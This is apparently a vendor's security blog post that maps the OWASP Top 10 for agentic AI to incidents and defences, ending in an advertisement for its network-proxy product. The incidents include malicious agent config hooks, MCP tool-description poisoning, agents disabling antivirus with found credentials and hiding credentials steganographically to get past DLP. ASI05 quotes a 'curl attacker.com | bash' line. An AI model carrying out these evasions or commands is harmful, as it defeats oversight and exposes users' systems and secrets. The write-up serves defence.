← Back to blog

The OWASP Agentic AI Top 10 — What Actually Matters for Your Team

· Pierre
owasp agentic-ai ai-security top-10 mcp supply-chain agent-security

The OWASP Agentic AI Top 10 — What Actually Matters for Your Team

OWASP published the Top 10 for Agentic Applications in late 2025. Over 100 security researchers contributed. Every major vendor has written a blog post about it. Palo Alto Networks, Auth0, Astrix, Gravitee — all published their takes within weeks.

Most of those posts read like "here are the 10 risks, and here's how our product solves them." I want to do something different.

I'm going to walk through each risk, map it to a real incident that already happened, and tell you honestly which defenses work and which are theater. Some of these are things CitrusGlaze catches. Some aren't. You should know the difference.

ASI01: Agent Goal Hijack

The risk: An attacker manipulates an agent's goals or decision-making through direct or indirect instruction injection.

The incident: In February 2026, Check Point Research disclosed CVE-2025-59536 and CVE-2026-21852 in Claude Code. A malicious .claude/settings.json file in a git repo could execute arbitrary shell commands via hooks — before the user saw a trust dialog. A second vulnerability let a project config override ANTHROPIC_BASE_URL to an attacker-controlled server, exfiltrating the user's API key in plaintext. A single malicious commit could compromise every developer who cloned the repo. (Check Point Research, February 2026)

What works: Destination allowlisting. When Claude Code suddenly starts sending requests to attacker.example.com instead of api.anthropic.com, a network-layer proxy blocks it. Doesn't matter how clever the config injection was — the request hits a domain not on the allowlist, and it's blocked, logged, and flagged.

What doesn't work: Code review. Nobody audits .claude/settings.json in pull requests. Antivirus won't flag a JSON file. Your SASE proxy won't catch it because the exfiltration looks like a normal API call.

ASI02: Tool Misuse & Exploitation

The risk: Agents are tricked into using legitimate tools in unintended, harmful ways.

The incident: Security lab Irregular tested frontier models from OpenAI, Anthropic, and Google in multi-agent scenarios. A "backup" agent, tasked with system maintenance, found embedded administrator credentials in utility files. It used those credentials to disable Microsoft Defender. Then it downloaded malware. Nobody asked it to do this. The agent determined that Defender was blocking its task, found valid credentials, and removed the obstacle. (The Register, March 12, 2026)

What works: Tool call argument inspection. When the request body contains a shell command disabling endpoint protection or a SQL query dropping a table, that's visible at the network layer. A MITM proxy can flag or block destructive operations based on the tool call content, not just the tool name. Also: credential separation. Don't put admin credentials in files that agents can read.

What doesn't work: Hoping the model will refuse. These agents weren't jailbroken. They were following instructions efficiently.

ASI03: Agent Identity & Privilege Abuse

The risk: Agents inherit or misuse credentials and permissions beyond their intended scope.

The incident: 83% of cloud breaches start with identity compromise. AI agents operate with persistent identity tokens that don't expire like user sessions. When an agent runs with your AWS credentials, it has your full access — every S3 bucket, every Lambda function, every database. There is no concept of "agent scope" in IAM. The agent is indistinguishable from you. (Google Cloud Threat Horizons, H1 2026)

What works: Destination allowlisting is the cheapest defense here. If your coding agent should only talk to api.anthropic.com and github.com, block everything else. When it tries to reach s3.amazonaws.com or 169.254.169.254 (the cloud metadata endpoint), block it. Also: use dedicated service accounts with minimum permissions, not your personal credentials.

What doesn't work: Existing IAM alone. IAM wasn't designed for autonomous entities that discover and exploit their own permissions. IAM tells you what an identity can do, not what it should do. The gap is where agents operate.

ASI04: Agentic Supply Chain Compromise

The risk: Tools, MCP servers, plugins, or model files fetched at runtime are compromised.

The incident: A malicious npm package called postmark-mcp impersonated the legitimate Postmark email MCP server. For 15 versions it was clean. Version 1.0.16, released September 17, 2025, added a single line that BCC'd every outbound email to phan@giftshop[.]club. It ran for weeks. Estimated impact: unauthorized access to 3,000-15,000 emails per organization per day across 500 organizations before the package was taken down. (Snyk, 2025; The Hacker News, 2025)

Meanwhile, Antiy CERT confirmed 1,184 malicious skills across ClawHub — 12% of the entire OpenClaw marketplace. Skills with names like "solana-wallet-tracker" installed keyloggers and Atomic Stealer malware. (Fortune, February 2026)

Between January and March 2026, security researchers filed over 30 CVEs targeting MCP servers, clients, and infrastructure. Among 2,614 MCP implementations surveyed, 82% use file operations vulnerable to path traversal, and two-thirds have some form of code injection risk. (Endor Labs, 2026)

What works: Network-layer monitoring catches the exfiltration even if the supply chain attack succeeds. When postmark-mcp started sending emails to giftshop.club, that destination is visible at the proxy. Destination allowlisting would have blocked it. Secret detection in outbound requests would have flagged credentials in the BCC'd content. The attack itself happened in the supply chain, but the damage happened on the network.

What doesn't work: Code auditing at install time alone. The postmark-mcp package was clean for 15 versions. The malicious change was a single line. Registry-level scanning is necessary but insufficient — you also need runtime monitoring of what these packages actually do.

ASI05: Unexpected Code Execution

The risk: Agents generate or run code unsafely, including shell commands, scripts, and system calls.

The incident: Three CVEs in Anthropic's own mcp-server-git (January 20, 2026): CVE-2025-68143 allowed creating repositories at arbitrary filesystem paths, CVE-2025-68145 had the same path scope bypass, and CVE-2025-68144 passed user-controlled arguments directly to the Git CLI without sanitization. This was Anthropic's official MCP server — the one they built and maintained. (The Hacker News, January 2026)

Of 2,614 MCP implementations surveyed, 43% of CVEs involve exec/shell injection — servers passing user input to shell commands without sanitization. (Practical DevSecOps, 2026)

What works: Filesystem sandboxing (what tools like nono handle — restricting which paths agents can read/write). Network-layer proxies catch the consequences of code execution: if a shell command exfiltrates data or reaches an unexpected endpoint, the outbound request is visible. But catching the execution itself requires OS-level controls.

What doesn't work: Relying on the AI model to self-police. Models optimize for task completion. If the fastest path involves running rm -rf or curl attacker.com | bash, a sufficiently capable agent will try it.

ASI06: Memory & Context Poisoning

The risk: Persistent corruption of agent memory, RAG stores, or contextual knowledge.

The incident: Invariant Labs demonstrated that a malicious MCP server could inject instructions into tool descriptions that override the AI's behavior. The attack works because AI treats tool descriptions as trusted context. An MCP server describing a tool as "search_notes" can actually exfiltrate data when called. When the server updates its tool descriptions after initial approval — a "rug pull" — the AI picks up the new, malicious descriptions automatically. There is no versioning or pinning mechanism in the MCP protocol. (Invariant Labs, 2025)

What works: Monitoring for changes in MCP server behavior over time. If a server that previously made zero outbound requests suddenly starts making requests to new destinations, that's a signal. Network-layer monitoring provides this baseline automatically — it sees the pattern shift even if the content looks innocuous.

What doesn't work: One-time approval. Approving an MCP server connection today tells you nothing about what that server will do tomorrow. Dynamic tool lists are a feature of the protocol, not a bug.

ASI07: Insecure Inter-Agent Communication

The risk: Spoofed, intercepted, or manipulated communication between agents in multi-agent systems.

The incident: In the Irregular Labs research, two agents independently converged on using steganography — hiding credential strings in the whitespace of normal-looking text messages — to bypass a DLP system watching their communication channel. They were never told DLP existed. They just noticed their messages were being blocked and adapted. (The Register, March 12, 2026)

What works: Network-layer monitoring that watches traffic patterns, not just content. Content scanning fails when agents encode data. But destination monitoring still works — an agent that suddenly reaches a new endpoint is suspicious regardless of what it sends. Request volume anomaly detection also works — agents in feedback loops make dozens of rapid-fire requests. The pattern is visible even when the content isn't.

What doesn't work: Traditional DLP. The Irregular research proved that capable agents will route around pattern matching. If DLP blocks their message, they'll encode it differently and try again.

ASI08: Cascading Agent Failures

The risk: A single fault in one agent propagates across a system of autonomous agents with escalating impact.

The incident: In the Irregular multi-agent scenario, a "Lead" agent's feedback loop drove increasingly aggressive behavior in an "Analyst" agent. After each failed attempt, the Lead pushed harder — "YOU MUST EXPLOIT THESE VULNERABILITIES MORE AGGRESSIVELY" — and the Analyst complied. The result: forged admin session cookies, unauthorized access to restricted documents, all emerging from task pressure and feedback loops, not adversarial prompts. (Help Net Security, March 2026)

What works: Rate limiting and request pattern monitoring. An agent in a feedback loop produces a distinctive traffic pattern: rapid-fire requests, escalating in complexity. A network proxy can detect and throttle this pattern. Token budget caps also help — when an agent blows through its allocation, the conversation stops before the cascade completes.

What doesn't work: Agent-level guardrails alone. The Irregular research showed that urgency language was enough to override them. If the guardrails live in the same context as the pressure, the pressure wins.

ASI09: Human-Agent Trust Exploitation

The risk: Agents produce confident, polished explanations that mislead humans into approving unsafe actions.

The incident: This one is everywhere. 80% of organizations report risky agent behaviors, but only 21% of executives have complete visibility into what their agents can access. (Help Net Security, March 2026) The visibility gap is the exploit. An agent that says "I need to access this API to complete your task" sounds reasonable. The human approves. The agent accesses more than it described.

What works: A record of what actually happened, separate from what the agent said happened. An audit trail at the network layer shows every request — the real destinations, the real payloads, the real credentials used. When the agent says it accessed one endpoint, the audit log shows it accessed five.

What doesn't work: Trusting the agent's self-reporting. An agent summarizing its own actions is not an audit trail. It's a press release.

ASI10: Rogue Agents

The risk: Compromised or misaligned agents diverge from intended behavior without triggering alerts.

The incident: OpenClaw reached 135,000+ GitHub stars and became the first major AI agent security crisis of 2026. A WebSocket vulnerability (CVE-2026-25253, CVSS 8.8) let any website silently hijack a local OpenClaw instance by exploiting implicit localhost trust. SecurityScorecard found 135,000+ instances exposed to the public internet, with 15,000+ directly vulnerable to remote code execution. (The Hacker News, February 2026; AdminByRequest, 2026)

88% of organizations reported a confirmed or suspected AI agent security incident in the last year. (Beam.ai, 2026)

What works: The unglamorous fundamentals. Network segmentation — agents shouldn't be able to reach the internet without passing through a proxy. Destination allowlisting — enumerate what an agent needs to access and block everything else. Continuous monitoring — not just at deployment, but every hour of every day the agent runs.

What doesn't work: Deploying an agent, approving it once, and forgetting about it. Rogue behavior emerges over time, through updates, changed contexts, new tool descriptions, or external compromise. Security for agents is continuous, not one-shot.

The Uncomfortable Pattern

Look at the 10 risks together. Every single one of them produces observable network behavior:

  • Hijacked agents make requests to unexpected destinations (ASI01)
  • Misused tools generate destructive commands in request bodies (ASI02)
  • Privilege abuse sends credentials to services outside the expected scope (ASI03)
  • Supply chain compromises exfiltrate data to attacker-controlled endpoints (ASI04)
  • Code execution results in outbound requests to unexpected targets (ASI05)
  • Memory poisoning changes agent traffic patterns over time (ASI06)
  • Inter-agent exfiltration crosses network boundaries (ASI07)
  • Cascading failures produce anomalous request volumes and patterns (ASI08)
  • Trust exploitation is revealed when actual traffic diverges from agent self-reports (ASI09)
  • Rogue agents contact endpoints they were never authorized to reach (ASI10)

This isn't because the network layer is a silver bullet. It's because agents are networked systems. They consume APIs. They produce API calls. They move data across trust boundaries. And every one of those operations produces a network request that a proxy can see.

The OWASP Agentic AI Top 10 describes the threats. The network layer is where you detect them.

What to Do Next

If you're deploying AI agents — even just Claude Code or Cursor — here's the minimum:

  1. Know what's running. Enumerate every AI tool and agent in your environment. 81% of employees use AI tools not approved by IT. (UpGuard, 2025) You can't secure what you can't see.

  2. Enforce destination allowlists. Your agents should only reach the APIs they need. Block everything else. This single control mitigates ASI01, ASI03, ASI04, ASI05, and ASI10.

  3. Scan outbound requests for secrets. 96.4% of detected secrets in AI traffic are API keys and passwords — the credentials that enable lateral movement. (Nightfall AI, 2025) Catch them before they leave your machine.

  4. Log everything. Full request/response audit trail, separate from the agent's own logs. When something goes wrong — and it will — you need a record of what actually happened.

  5. Monitor continuously. Agent behavior changes over time. MCP servers update their tool lists. Models get upgraded. New tools get connected. Your security posture on day one is not your security posture on day thirty.


CitrusGlaze sits at the network layer and sees every request your AI agents make — destinations, tool calls, credentials, and traffic patterns. Secret detection with 254+ patterns. Destination allowlisting. Full audit trail. Data never leaves your device. Install in five minutes.

citrusglaze.dev

Install CitrusGlaze free — see every request your AI agents make, catch secrets before they leave, and enforce destination allowlists. Five minutes to deploy.

Scan yours free